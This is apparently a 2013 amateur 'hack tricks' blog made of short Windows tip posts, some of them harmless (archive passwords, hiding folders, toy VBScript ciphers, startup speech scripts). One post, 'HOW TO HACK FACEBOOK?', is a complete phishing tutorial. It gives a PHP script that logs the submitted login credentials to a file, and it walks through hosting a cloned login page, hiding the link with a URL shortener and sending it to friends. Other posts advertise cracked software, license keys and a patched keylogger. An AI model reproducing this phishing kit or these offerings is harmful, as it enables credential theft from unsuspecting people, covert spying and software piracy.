Thursday, 1 August 2013

WANT TO CREATE A PASSWORD PROTECTED .RAR FILES?

                                Hey guys here i am going to tell you about how to create a password protected .rar files. If you want to do this just follow the steps below.

step 1: Right click on the file which you want to make .rar file.
step 2: Then click add to archive.
step 3: From the appeared window select Advance tab.
step 4: Now click the set password button and enter password which you wish to use.
step 5: Then check the Encrypt file names checkbox and click ok.
step 6: Now go to the General tab and check the lock archive checkbox.

           Thats all you created the password protected .rar file. Now you can secure your
personal files from others.

Enjoy:-)

Like and share with your friends:-):-)


Wednesday, 10 July 2013

INTERNET DOWNLOAD MANAGER WITH CRACK

 Hey guys do you really want high speed download manager here it is.
               
                                 

Sunday, 7 July 2013

HOW TO HACK FACEBOOK?

           
             Hey guys here i gonna tell you about how to hack a facebook account using a famous method called PHISHING .

             First of all you have to know what is phishing method. Phishing method means creating a fake login page .

Follow the below steps to create Phishing Page.

Step 1: First go to www.facebook.com
Step 2: Then save the login page in a new folder.(folder name may anything)
Step 3: After that go to that new folder you can see 2 things inside the new folder
           1. Welcome to Facebook - Log In, Sign Up or Learn More page .
           2. Welcome to Facebook - Log In, Sign Up or Learn More_files folder.
Step 4: Then create one empty text file name it as hack.txt
Step 5: Then copy the below code into notepad and name it as "hacking.php".


            <?php
            header ('Location:https://www.facebook.com/recover.php');
            $handle = fopen("hack.txt", "a");
            foreach($_POST as $variable => $value) 
            {
             fwrite($handle, $variable);
             fwrite($handle, "=");
             fwrite($handle, $value);
             fwrite($handle, "rn");
            }
            fwrite($handle, "rn");
            fclose($handle);
            exit;
            ?>   

Step 6: Then open Welcome to Facebook - Log In, Sign Up or Learn More page .
            with notepad.
Step 7: Press ctrl + F and type action= in the search box and press enter.
Step 8: Replace the link which is present inside the action=""with action="hacking.php"        
           and save that php file.     
Step 9: Goto www.110mb.com and signup. After the successful sign_in open file manager 
           and upload the files which are created in the earlier steps.  
Step 10: Now open the Welcome to Facebook - Log In, Sign Up or Learn More page
             and copy the URL.
Step 11: Then goto www.bit.ly and paste your link. Now you can get the new link.

           Congratulations you have created a fake login page now you can give your link to your frnds. When your frnds login using your fake login page the Email and Password will be stored into the hack.txt file in your account.

Note : 1. Give your link when he/she in the online via post or chat.  
          2. Use www.box19.110mb.com/fileman.php after the first login.

If you have any queries dnt hesitate to comment me frnds:-)   


Saturday, 22 June 2013

DROP BOX FREE DOWNLOAD

         

On line free storage upto 2 gb

FREE!!FREE!!FREE

          Download Here

WANT PATTERN LOCK FOR PC?



Hey Guys do u want to lock your PC with pattern lock ?

                               Download Here

Sunday, 2 June 2013

HOW TO HIDE YOUR FILES IN IMAGES?



Hey guys do u know you can hide your files inside the image.
its awesome ah

step 1: Convert your files into rar file.
step 2: Create a new folder.
step 3: Inside that folder put your rar file and one jpg image.
step 4: Then open cmd prompt and give the path of that folder.
step 5: Then type below command to the cmd prompt.

COPY /b image name.jpg + rar file name.rar o/p image name.jpg

thats all frnds

Note: 

If you open the o/p image you will see the actual image and if you open with winrar           you can see your files.


If any query comment me.....

like & share frnds.....

Friday, 31 May 2013

HOW TO HIDE YOUR FOLDERS?





Step 1: Create a new folder .
Step 2: Then right-click -> properties -> customize -> change icon
Step 3: Scroll right.You can find the Empty Icon.
Step 4: Then click Ok or Apply.
Step 5: Then goto search box on start menu.Type char map. One window will open.
Step 6: Scroll down you can find Empty Char.Copy that char.
Step 7: Then right-click on that folder -> Rename -> Press ctrl + v.


Thats all .Now you can hide your crazy stuffs on that hidden folder.bye:-)

Wednesday, 29 May 2013

AVAST FREE ANTI VIRUS WITH KEY UPTO 2038.


Avast free Anti virus with key upto 2038.


ARDAMAX KEYLOGGER WITH PATCH



Hey guys do you want Ardamax keylogger and its patch.

Tuesday, 28 May 2013

PASSWORD PROTECTED TEXT FILES



Password protect text files
------------------------------------------------

Do you want to create a password protected text file to store your private data? The happy news is you can do it without downloading any special software. You only need notepad to make a simple program which can password protected text files!

1. Open notepad and paste the code given below.

TITLE easyhacktricksss.blogspot.com
ECHO OFF
COLOR 03
CLS
ECHO.
ECHO *******************************
ECHO * easyhacktricksss.blogspot.com *
ECHO *******************************
ECHO.
ECHO Enter your password:
SET/P "USRN=>"
NOTEPAD hacked.txt:%USRN%

2. After pasting save as a FileSecure.bat. Remember to put .bat extension.

3. Open the batch file. You will be prompted for a password. Enter any password you like. A notepad window will open. Now type in your data and save the file.

After you save the file you will see a file named hacked.txt in the same folder as the batch file. This file will contain all the data you saved earlier. But when you open the file it will seem to appear blank! To access your data open the batch file and enter the password you entered earlier. A notepad window will open with the data you entered.

You can also create multiple users by entering different passwords for each one. All the data will be stored in the hacked.txt but will still appear blank. You can always access your data by opening the batch file and entering your password.

IMPORTANT: Do not delete the hacked.txt and remember to keep the batch file and hacked.txt in the same folder.

Remember to like and share!

HOW TO MAKE A SECRET TEXT FILES PART-2



How to make a text encryption program - Part 2
---------------------------------------------------------------------

In my previous I showed you how to make a text encryption program. Now here is how to make the program to decrypt the the codes from my previous program.

1. Open notepad and paste the following code:

text = ""
code = Inputbox("Enter the code to decrypt:", "REJIMALson")
pswd = Inputbox("Enter the password:", "REJIMALson")
Validate()

Function Validate()
If Not (IsNumeric(pswd)) Then
X = Msgbox("Not a numeric password!", 48, "REJIMALson")
Else If Not (code = "") Then
Decrypt()
Else
End If
End If
End Function

Function Decrypt()
pswd = pswd Mod 255
Do Until code = ""
num = Asc(Left(code, 1))
num = num-pswd
Do While num < 0
num = num+255
Loop
lttr = Chr(num)
text = text & lttr
code = Replace(code, Left(code, 1), "", 1, 1)
Loop
junk = Inputbox("Decrypted text:", "REJIMALson", text)
End Function

2. Save the file as anything.vbs. Remember to put the .vbs at the end while saving.

Enjoy! This program is only useful for ciphering and deciphering. I am working on a text encryption program which can encrypt long text strings and output in only uppercase letters and numbers. I am hoping to finish it by this month. Hope fully I will post it by the end of this month.

Hope you will be waiting for it. Please share the page with your friends.

Sunday, 26 May 2013

HOW TO MAKE A SECRET TEXT FILES PART-1




How to make a text encryption program part-1
---------------------------------------------------------------------

Here is how to convert a piece of text string into a secret code using a given a password! All you need is notepad.

1. Open notepad and paste the code given below:

code = ""
text = Inputbox("Enter the text to encrypt:", "REJIMALson")
pswd = Inputbox("Enter the password:", "REJIMALson")
Validate()

Function Validate()
If Not (IsNumeric(pswd)) Then
X = Msgbox("Not a numeric password!", 48, "REJIMALson")
Else If Not (text = "") Then
Encrypt()
Else
End If
End If
End Function

Function Encrypt()
pswd = pswd Mod 255
Do Until text = ""
num = Asc(Left(text, 1))
num = num+pswd Mod 255
lttr = Chr(num)
code = code & lttr
text = Replace(text, Left(text, 1), "", 1, 1)
Loop
junk = Inputbox("Encrypted text:", "REJIMALson", code)
End Function

2. Save the code as a .vbs file. You can name it anything but remeber to put .vbs at the end while saving.

Open the file and enjoy!

Saturday, 25 May 2013

TALKING PC



Make Your PC To Say Something On Startup

No softwares needed..guys

step 1: Open notepad and copy the following code.

Dim speaks, speech
speaks="Welcome Dude"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks

You can change "Welcome Dude" word as you wish.
Remember to use punctuation to get the pronunciation more correct.

step 2: Now save as anyname.vbs extension (ex: Welcome.vbs).

step 3: Now put it in startup folder.
           You can find your startup folder using below path.

In Windows XP C:\Documents and Settings\All Users\Start Menu\Programs\Startup
In Windows Vista, 7 and 8 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

Now, each time you log on, you will be hear your welcome message.
Enjoy !

like our page for more updates...

feel free to comment guys:-)

AVG FREE UPTO 2018



     Avg Antivirus 2013 With Keys Till 2018.

            Dont miss this one Guys. Go and Get the Keys.



AUTO TYPING NOTEPAD



Hey guys are you interested to have auto typing notepad!!!

Here is the steps for you.....


step 1: open notepad.

step 2: copy the below code.

Set wshshell = wscript.CreateObject("WScript.Shell") 
Wshshell.run "Notepad" 
wscript.sleep 400
wshshell.sendkeys "R"
wscript.sleep 100
wshshell.sendkeys "E"
wscript.sleep 120
wshshell.sendkeys "J"
wscript.sleep 200
wshshell.sendkeys "I"
wscript.sleep 100
wshshell.sendkeys "M"
wscript.sleep 140
wshshell.sendkeys "A"
wscript.sleep 100
wshshell.sendkeys "L"
wscript.sleep 50
wshshell.sendkeys "s"
wscript.sleep 120
wshshell.sendkeys "o"
wscript.sleep 170
wshshell.sendkeys "n"
wscript.sleep 200
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "A"
wscript.sleep 50
wshshell.sendkeys "N"
wscript.sleep 120
wshshell.sendkeys "T"
wscript.sleep 160
wshshell.sendkeys "O"
wscript.sleep 200
wshshell.sendkeys "N"
wscript.sleep 100
wshshell.sendkeys "Y"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "W"
wscript.sleep 100
wshshell.sendkeys "E"
wscript.sleep 100
wshshell.sendkeys "L"
wscript.sleep 100
wshshell.sendkeys "C"
wscript.sleep 100
wshshell.sendkeys "O"
wscript.sleep 100
wshshell.sendkeys "M"
wscript.sleep 100
wshshell.sendkeys "E"
wscript.sleep 100
wshshell.sendkeys "S"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "Y"
wscript.sleep 100
wshshell.sendkeys "O"
wscript.sleep 100
wshshell.sendkeys "U"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "G"
wscript.sleep 100
wshshell.sendkeys "U"
wscript.sleep 100
wshshell.sendkeys "Y"
wscript.sleep 100
wshshell.sendkeys "S"
wscript.sleep 100
wshshell.sendkeys "."
wscript.sleep 100
wshshell.sendkeys "."
wscript.sleep 100
wshshell.sendkeys "."
wscript.sleep 100
wshshell.sendkeys "."
wscript.sleep 100


step 3: save it as anyname.vbs.(note : extension should be .vbs but name can be anything)

step 4: open the file you will see the magic.


like our page for more updation on facebook.